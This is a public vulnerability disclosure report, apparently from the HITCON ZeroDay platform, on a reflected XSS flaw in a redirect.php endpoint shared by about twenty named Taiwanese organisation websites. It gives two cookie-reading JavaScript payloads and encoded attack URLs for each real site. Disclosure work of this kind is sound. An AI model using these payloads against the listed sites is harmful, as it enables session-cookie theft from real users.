Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-00580
- Vendor: 永祥資訊管理有限公司
- Title: 由永翔資訊管理公司開發的多家機構網站,存在反射式跨站腳本(rXSS)弱點
- Introduction: 這些網站共同的 redirect.php 端點之 showmsg 欄位,存在rXSS弱點。
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2025/06/15 07:56:49 : 新提交 (由 阿美 更新此狀態)
- 2025/06/16 16:45:31 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/20 16:56:19 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/20 16:56:19 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/08/13 14:34:20 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/08/13 14:51:16 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/08/13 15:02:34 : 複測申請中 (由 組織帳號 更新此狀態)
- 2025/08/31 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-00580
- 通報者:gmwa (阿美)
- 風險:中
- 類型:反射型跨站腳本攻擊 (Reflected Cross-Site Scripting)
參考資料
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
相關網址
http://www.shengann.com.tw/redirect.php?showmsg=
https://www.cth.org.tw/redirect.php?showmsg=
http://chteacher.org.tw/redirect.php?showmsg=
http://chunjhou.com.tw/redirect.php?showmsg=
https://www.ch-industry.org.tw/redirect.php?showmsg=
http://www.hsuehi.com.tw/redirect.php?showmsg=
http://www.ths.tw/redirect.php?showmsg=
http://chengjer.com.tw/redirect.php?showmsg=
http://yiuchen.com.tw/redirect.php?showmsg=
http://aspire-auto.com.tw/redirect.php?showmsg=
http://www.hunyi.com.tw/redirect.php?showmsg=
https://www.eiffelnet.com.tw/redirect.php?showmsg=
http://www.chuiro.com.tw/redirect.php?showmsg=
http://der-lin.com.tw/redirect.php?showmsg=
http://salianbao.org.tw/redirect.php?showmsg=
https://www.kindergarten.org.tw/redirect.php?showmsg=
http://www.cpuac.org.tw/redirect.php?showmsg=
http://www.tunglin.com.tw/redirect.php?showmsg=
http://www.malzine.com.tw/redirect.php?showmsg=
敘述
這些網站共同的 redirect.php 端點之 showmsg 欄位,存在rXSS弱點,附圖為其中某網站的例子,其他網站也是相同效果,都是列出他的 PHPSESSID 值,針對此弱點的payload,分成兩種形式:
- 第一種不需使用<script>標籤:","");alert("PHPSESSID: "+getCookie("PHPSESSID"));window.alert=function() {};showMsg("
- 第二種則使用<script>標籤:<script>alert("PHPSESSID: "+getCookie("PHPSESSID"));window.alert=function() {};window.setTimeout=function() {};</script>
注意:payload必須經過 BASE64 編碼及 URLEncode 編碼。
這些網站有些只接受其中一種payload,有些則兩種payload都能引發XSS效果,分類如下:
-
適用第一類payload的網站,及攻擊用URL:
永祥資訊管理公司
https://www.servernet.btb.tw/redirect.php?showmsg=IiwiIik7YWxlcnQoIlBIUFNFU1NJRDogIitnZXRDb29raWUoIlBIUFNFU1NJRCIpKTt3aW5kb3cuYWxlcnQ9ZnVuY3Rpb24oKSB7fTtzaG93TXNnKCI%3D&gourl=YWRtaW4v
勝安牙醫
http://www.shengann.com.tw/redirect.php?showmsg=IiwiIik7YWxlcnQoIlBIUFNFU1NJRDogIitnZXRDb29raWUoIlBIUFNFU1NJRCIpKTt3aW5kb3cuYWxlcnQ9ZnVuY3Rpb24oKSB7fTtzaG93TXNnKCI%3D&gourl=YWRtaW4v
耕莘醫院
https://www.cth.org.tw/redirect.php?showmsg=IiwiIik7YWxlcnQoIlBIUFNFU1NJRDogIitnZXRDb29raWUoIlBIUFNFU1NJRCIpKTt3aW5kb3cuYWxlcnQ9ZnVuY3Rpb24oKSB7fTtzaG93TXNnKCI%3D&gourl=YWRtaW4v
彰化縣才藝教學服務人員職業工會
http://chteacher.org.tw/redirect.php?showmsg=IiwiIik7YWxlcnQoIlBIUFNFU1NJRDogIitnZXRDb29raWUoIlBIUFNFU1NJRCIpKTt3aW5kb3cuYWxlcnQ9ZnVuY3Rpb24oKSB7fTtzaG93TXNnKCI%3D&gourl=YWRtaW4vYWRtaW4ucGhw
** 春竹食品
*** http://chunjhou.com.tw/redirect.php?showmsg=IiwiIik7YWxlcnQoIlBIUFNFU1NJRDogIitnZXRDb29raWUoIlBIUFNFU1NJRCIpKTt3aW5kb3cuYWxlcnQ9ZnVuY3Rpb24oKSB7fTtzaG93TXNnKCI%3D&gourl=YWRtaW4vYWRtaW4ucGhw -
適用第二類payload的網站,及攻擊用URL:
彰化市工業會
https://www.ch-industry.org.tw/redirect.php?showmsg=PHNjcmlwdD5hbGVydCgiUEhQU0VTU0lEOiAiK2dldENvb2tpZSgiUEhQU0VTU0lEIikpO3dpbmRvdy5hbGVydD1mdW5jdGlvbigpIHt9O3dpbmRvdy5zZXRUaW1lb3V0PWZ1bmN0aW9uKCkge307PC9zY3JpcHQ-&gourl=YWRtaW4v
學一企業
http://www.hsuehi.com.tw/redirect.php?showmsg=PHNjcmlwdD5hbGVydCgiUEhQU0VTU0lEOiAiK2dldENvb2tpZSgiUEhQU0VTU0lEIikpO3dpbmRvdy5hbGVydD1mdW5jdGlvbigpIHt9O3dpbmRvdy5zZXRUaW1lb3V0PWZ1bmN0aW9uKCkge307PC9zY3JpcHQ-&gourl=YWRtaW4v
鈦鉿興公司
http://www.ths.tw/redirect.php?showmsg=PHNjcmlwdD5hbGVydCgiUEhQU0VTU0lEOiAiK2dldENvb2tpZSgiUEhQU0VTU0lEIikpO3dpbmRvdy5hbGVydD1mdW5jdGlvbigpIHt9O3dpbmRvdy5zZXRUaW1lb3V0PWZ1bmN0aW9uKCkge307PC9zY3JpcHQ-&gourl=YWRtaW4v
茂駒有限公司
http://chengjer.com.tw/redirect.php?showmsg=PHNjcmlwdD5hbGVydCgiUEhQU0VTU0lEOiAiK2dldENvb2tpZSgiUEhQU0VTU0lEIikpO3dpbmRvdy5hbGVydD1mdW5jdGlvbigpIHt9O3dpbmRvdy5zZXRUaW1lb3V0PWZ1bmN0aW9uKCkge307PC9zY3JpcHQ-&gourl=YWRtaW4v
宇呈股份
http://yiuchen.com.tw/redirect.php?showmsg=PHNjcmlwdD5hbGVydCgiUEhQU0VTU0lEOiAiK2dldENvb2tpZSgiUEhQU0VTU0lEIikpO3dpbmRvdy5hbGVydD1mdW5jdGlvbigpIHt9O3dpbmRvdy5zZXRUaW1lb3V0PWZ1bmN0aW9uKCkge307PC9zY3JpcHQ-&gourl=YWRtaW4v
翊翔電機
http://aspire-auto.com.tw/redirect.php?showmsg=PHNjcmlwdD5hbGVydCgiUEhQU0VTU0lEOiAiK2dldENvb2tpZSgiUEhQU0VTU0lEIikpO3dpbmRvdy5hbGVydD1mdW5jdGlvbigpIHt9O3dpbmRvdy5zZXRUaW1lb3V0PWZ1bmN0aW9uKCkge307PC9zY3JpcHQ-&gourl=YWRtaW4v
弘翊興業
http://www.hunyi.com.tw/redirect.php?showmsg=PHNjcmlwdD5hbGVydCgiUEhQU0VTU0lEOiAiK2dldENvb2tpZSgiUEhQU0VTU0lEIikpO3dpbmRvdy5hbGVydD1mdW5jdGlvbigpIHt9O3dpbmRvdy5zZXRUaW1lb3V0PWZ1bmN0aW9uKCkge307PC9zY3JpcHQ-&gourl=YWRtaW4vYWRtaW4ucGhw
愛菲爾
https://www.eiffelnet.com.tw/redirect.php?showmsg=PHNjcmlwdD5hbGVydCgiUEhQU0VTU0lEOiAiK2dldENvb2tpZSgiUEhQU0VTU0lEIikpO3dpbmRvdy5hbGVydD1mdW5jdGlvbigpIHt9O3dpbmRvdy5zZXRUaW1lb3V0PWZ1bmN0aW9uKCkge307PC9zY3JpcHQ-&gourl=YWRtaW4vYWRtaW4ucGhw -
兩類payload皆適用的網站,及攻擊用URL:
彰鋼鐵材(兩種皆可)
** http://www.chuiro.com.tw/redirect.php?showmsg=IiwiIik7YWxlcnQoIlBIUFNFU1NJRDogIitnZXRDb29raWUoIlBIUFNFU1NJRCIpKTt3aW5kb3cuYWxlcnQ9ZnVuY3Rpb24oKSB7fTtzaG93TXNnKCI%3D&gourl=YWRtaW4vYWRtaW4ucGhw
http://www.chuiro.com.tw/redirect.php?showmsg=PHNjcmlwdD5hbGVydCgiUEhQU0VTU0lEOiAiK2dldENvb2tpZSgiUEhQU0VTU0lEIikpO3dpbmRvdy5hbGVydD1mdW5jdGlvbigpIHt9O3dpbmRvdy5zZXRUaW1lb3V0PWZ1bmN0aW9uKCkge307PC9zY3JpcHQ-&gourl=YWRtaW4vYWRtaW4ucGhw
德林廣角鏡有限公司(兩種皆可)
** http://der-lin.com.tw/redirect.php?showmsg=IiwiIik7YWxlcnQoIlBIUFNFU1NJRDogIitnZXRDb29raWUoIlBIUFNFU1NJRCIpKTt3aW5kb3cuYWxlcnQ9ZnVuY3Rpb24oKSB7fTtzaG93TXNnKCI%3D&gourl=YWRtaW4vYWRtaW4ucGhw
http://der-lin.com.tw/redirect.php?showmsg=PHNjcmlwdD5hbGVydCgiUEhQU0VTU0lEOiAiK2dldENvb2tpZSgiUEhQU0VTU0lEIikpO3dpbmRvdy5hbGVydD1mdW5jdGlvbigpIHt9O3dpbmRvdy5zZXRUaW1lb3V0PWZ1bmN0aW9uKCkge307PC9zY3JpcHQ-&gourl=YWRtaW4vYWRtaW4ucGhw
沙連堡文化藝術策進會(兩種皆可)
** http://salianbao.org.tw/redirect.php?showmsg=IiwiIik7YWxlcnQoIlBIUFNFU1NJRDogIitnZXRDb29raWUoIlBIUFNFU1NJRCIpKTt3aW5kb3cuYWxlcnQ9ZnVuY3Rpb24oKSB7fTtzaG93TXNnKCI%3D&gourl=YWRtaW4vYWRtaW4ucGhw
http://salianbao.org.tw/redirect.php?showmsg=PHNjcmlwdD5hbGVydCgiUEhQU0VTU0lEOiAiK2dldENvb2tpZSgiUEhQU0VTU0lEIikpO3dpbmRvdy5hbGVydD1mdW5jdGlvbigpIHt9O3dpbmRvdy5zZXRUaW1lb3V0PWZ1bmN0aW9uKCkge307PC9zY3JpcHQ-&gourl=YWRtaW4vYWRtaW4ucGhw
彰化縣幼稚教育事業學會(兩種皆可)
** https://www.kindergarten.org.tw/redirect.php?showmsg=IiwiIik7YWxlcnQoIlBIUFNFU1NJRDogIitnZXRDb29raWUoIlBIUFNFU1NJRCIpKTt3aW5kb3cuYWxlcnQ9ZnVuY3Rpb24oKSB7fTtzaG93TXNnKCI%3D&gourl=YWRtaW4vYWRtaW4ucGhw
https://www.kindergarten.org.tw/redirect.php?showmsg=PHNjcmlwdD5hbGVydCgiUEhQU0VTU0lEOiAiK2dldENvb2tpZSgiUEhQU0VTU0lEIikpO3dpbmRvdy5hbGVydD1mdW5jdGlvbigpIHt9O3dpbmRvdy5zZXRUaW1lb3V0PWZ1bmN0aW9uKCkge307PC9zY3JpcHQ-&gourl=YWRtaW4vYWRtaW4ucGhw
彰化縣各級學校家長會聯合會(兩種皆可)
** http://www.cpuac.org.tw/redirect.php?showmsg=IiwiIik7YWxlcnQoIlBIUFNFU1NJRDogIitnZXRDb29raWUoIlBIUFNFU1NJRCIpKTt3aW5kb3cuYWxlcnQ9ZnVuY3Rpb24oKSB7fTtzaG93TXNnKCI%3D&gourl=YWRtaW4vYWRtaW4ucGhw
http://www.cpuac.org.tw/redirect.php?showmsg=PHNjcmlwdD5hbGVydCgiUEhQU0VTU0lEOiAiK2dldENvb2tpZSgiUEhQU0VTU0lEIikpO3dpbmRvdy5hbGVydD1mdW5jdGlvbigpIHt9O3dpbmRvdy5zZXRUaW1lb3V0PWZ1bmN0aW9uKCkge307PC9zY3JpcHQ-&gourl=YWRtaW4vYWRtaW4ucGhw
東霖公司(兩種皆可)
** http://www.tunglin.com.tw/redirect.php?showmsg=IiwiIik7YWxlcnQoIlBIUFNFU1NJRDogIitnZXRDb29raWUoIlBIUFNFU1NJRCIpKTt3aW5kb3cuYWxlcnQ9ZnVuY3Rpb24oKSB7fTtzaG93TXNnKCI%3D&gourl=YWRtaW4vYWRtaW4ucGhw
http://www.tunglin.com.tw/redirect.php?showmsg=PHNjcmlwdD5hbGVydCgiUEhQU0VTU0lEOiAiK2dldENvb2tpZSgiUEhQU0VTU0lEIikpO3dpbmRvdy5hbGVydD1mdW5jdGlvbigpIHt9O3dpbmRvdy5zZXRUaW1lb3V0PWZ1bmN0aW9uKCkge307PC9zY3JpcHQ-&gourl=YWRtaW4vYWRtaW4ucGhw
麥箖公司(兩種皆可)
** http://www.malzine.com.tw/redirect.php?showmsg=IiwiIik7YWxlcnQoIlBIUFNFU1NJRDogIitnZXRDb29raWUoIlBIUFNFU1NJRCIpKTt3aW5kb3cuYWxlcnQ9ZnVuY3Rpb24oKSB7fTtzaG93TXNnKCI%3D&gourl=YWRtaW4vYWRtaW4ucGhw
http://www.malzine.com.tw/redirect.php?showmsg=PHNjcmlwdD5hbGVydCgiUEhQU0VTU0lEOiAiK2dldENvb2tpZSgiUEhQU0VTU0lEIikpO3dpbmRvdy5hbGVydD1mdW5jdGlvbigpIHt9O3dpbmRvdy5zZXRUaW1lb3V0PWZ1bmN0aW9uKCkge307PC9zY3JpcHQ-&gourl=YWRtaW4vYWRtaW4ucGhw
修補建議
對使用者提交的內容應適當過濾,將資料輸出(合併)至HTML時,建議做 HTMLEncode處理。